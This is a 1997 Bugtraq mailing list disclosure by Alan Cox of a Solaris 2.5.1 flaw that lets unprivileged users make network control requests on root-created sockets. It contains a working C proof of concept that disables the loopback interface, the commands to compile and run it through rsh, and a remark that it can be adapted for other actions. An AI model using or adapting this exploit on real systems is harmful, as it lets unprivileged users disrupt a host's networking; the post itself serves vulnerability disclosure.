Bugtraq mailing list archives
Solaris 2.5.1 party piece
From: alan () LXORGUK UKUU ORG UK (Alan Cox)
Date: Thu, 19 Jun 1997 15:27:39 +0100
Well CERT have had this for a year, AUSCERT for a couple of weeks and
now its time bugtraq had it
cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck
solarisuck.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
struct ifreq please_break_me;
strcpy( please_break_me.ifr_name, "lo0");
please_break_me.ifr_flags=0;
if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
perror("Damn it didnt work. Obviously not Solaris ;)");
}
You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.
Workarounds:
1. Disable rsh and any non root owned inetd tasks - breaks remote tar etc
2. Run an OS that the vendor doesnt take a year to fix bugs in
I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.
Alan
Current thread:
- Re: Netscape Admin Servers /tmp/deamonstat Matthew Archibald (Jun 17)
- Re: Netscape Admin Servers /tmp/deamonstat Joe Zbiciak (Jun 17)
- Solaris 2.5.1 party piece Alan Cox (Jun 19)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- Re: Core file anomalies under BSDi 3.0 Theo de Raadt (Jun 20)
- Re: Core file anomalies under BSDi 3.0 Ariel Biener (Jun 20)
- http://www.news.com/News/Item/0,4,11759,00.html Aleph One (Jun 20)
- Re: http://www.news.com/News/Item/0,4,11759,00.html Raymond Dijkxhoorn (Jun 21)
- Re: Core file anomalies under BSDi 3.0 Stacey Son (Jun 20)
- Core file anomalies under BSDi 3.0 Nir Soffer (Jun 19)
- /cgi-bin/handler - more notes Razvan Dragomirescu (Jun 19)
- Re: Solaris 2.5.1 party piece Doug Hughes (Jun 19)
- Re: Solaris 2.5.1 party piece Bojan Zdrnja (Jun 20)
- Re: Solaris 2.5.1 party piece Joe Gross (Jun 20)